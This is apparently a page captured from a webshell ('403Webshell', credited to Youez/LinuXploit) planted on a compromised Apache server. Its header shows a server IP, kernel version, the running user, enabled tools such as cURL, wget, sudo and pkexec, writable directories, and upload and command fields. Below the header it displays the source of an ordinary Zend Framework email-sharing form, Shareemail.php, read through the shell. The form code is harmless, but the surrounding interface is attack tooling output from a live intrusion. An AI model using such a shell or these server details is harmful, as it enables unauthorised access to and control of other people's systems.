403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/dcb/application/forms/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/dcb/application/forms/Shareemail.php
<?php

class Application_Form_Shareemail extends Zend_Form
{
	public function __construct($params = null)
	{               
            $this->setMethod("POST");
            $this->setAction("dcb/index/email");
            $this->setName("add_share_email");

            
            /************ Email  *****************/
            $emailto = $this->createElement('text','emailto',
                                array(
                                     //'value' => trim($params['emailto']),
                                     'class' => 'txtfield',
                                        'id' => 'emailto',
                                    'placeholder' => 'Email ID *',
                                    'required'=>true,
                                    'filters' => array('StringTrim'),
                                    'validators' => array('EmailAddress',)
                             ))	 
                            ->setErrorMessages(array('Enter valid email id'))
                            ->removeDecorator('label')
                            ->removeDecorator('HtmlTag')
                            ->removeDecorator('DtDdWrapper');          
            
                        
            /************ Last Name  *****************/
            $sender = $this->createElement('text','sender',
                                array(
                                    // 'value' => trim($params['sender']),
                                     'class' => 'txtfield',
                                        'id' => 'sender',
                                    'placeholder' => 'Sender *',
                                    'required'=>true,
                                    'filters' => array('StringTrim'),
                                   'validators' => array(array("Alpha", true, array("allowWhiteSpace" => true))),
                             ))	 
                            ->setErrorMessages(array('Enter Sender'))
                            ->removeDecorator('label')
                            ->removeDecorator('HtmlTag')
                            ->removeDecorator('DtDdWrapper');
            
            /************ Email  *****************/
            $emailfrom = $this->createElement('text','emailfrom',
                                array(
                                    // 'value' => trim($params['emailfrom']),
                                     'class' => 'txtfield',
                                        'id' => 'emailfrom',
                                    'placeholder' => 'Your Email *',
                                    'required'=>true,
                                    'filters' => array('StringTrim'),
                                    'validators' => array('EmailAddress',)
                             ))	 
                            ->setErrorMessages(array('Enter valid email id'))
                            ->removeDecorator('label')
                            ->removeDecorator('HtmlTag')
                            ->removeDecorator('DtDdWrapper'); 
            
            /************ Last Name  *****************/
            $subject = $this->createElement('text','subject',
                                array(
                                    // 'value' => trim($params['subject']),
                                     'class' => 'txtfield',
                                        'id' => 'subject',
                                    'placeholder' => 'Subject *',
                                    'required'=>true,
                                    'filters' => array('StringTrim'),
                                   'validators' => array(array("Alpha", true, array("allowWhiteSpace" => true))),
                             ))	 
                            ->setErrorMessages(array('Enter Subject'))
                            ->removeDecorator('label')
                            ->removeDecorator('HtmlTag')
                            ->removeDecorator('DtDdWrapper');
            
            /************ Last Name  *****************/
            $message = $this->createElement('textarea','message',
                                array(
                                   //  'value' => trim($params['message']),
                                     'class' => 'txtfield1',
                                        'id' => 'message',
                                    'rows'   =>3,
                                    'cols'   =>15,
                                    'placeholder' => 'Message *',
                                    'required'=>true,
                                    'filters' => array('StringTrim'),
                                   'validators' => array(array("Alpha", true, array("allowWhiteSpace" => true))),
                             ))	 
                            ->setErrorMessages(array('Enter Message'))
                            ->removeDecorator('label')
                            ->removeDecorator('HtmlTag')
                            ->removeDecorator('DtDdWrapper');
            
            
                                       
            $this->addElements(array(  
            $emailto,
            $sender,    
            $emailfrom,  
            $subject,    
            $message
            )); 
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit